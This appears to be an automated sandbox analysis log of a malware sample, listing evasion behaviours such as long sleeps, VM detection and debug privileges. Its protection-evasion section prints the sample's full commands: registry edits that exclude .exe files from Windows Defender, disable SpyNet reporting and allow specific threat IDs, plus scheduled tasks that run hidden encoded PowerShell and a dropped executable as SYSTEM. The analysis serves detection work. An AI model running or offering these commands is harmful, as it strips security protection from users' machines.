Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680 Thread sleep count: 2307 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6140 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2307 Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040553A FindFirstFileA, 0_2_0040553A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, 0_2_004055DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\ Jump to behavior
Source: file.exe Binary or memory string: V{TvMci:
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00418320
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041584A SetUnhandledExceptionFilter, 0_2_0041584A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041585C SetUnhandledExceptionFilter, 0_2_0041585C

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gbyyeslrl" /sc once /st 15:13:59 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64& Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64& Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gbyyeslrl" /sc once /st 15:13:59 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa==" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force Jump to behavior
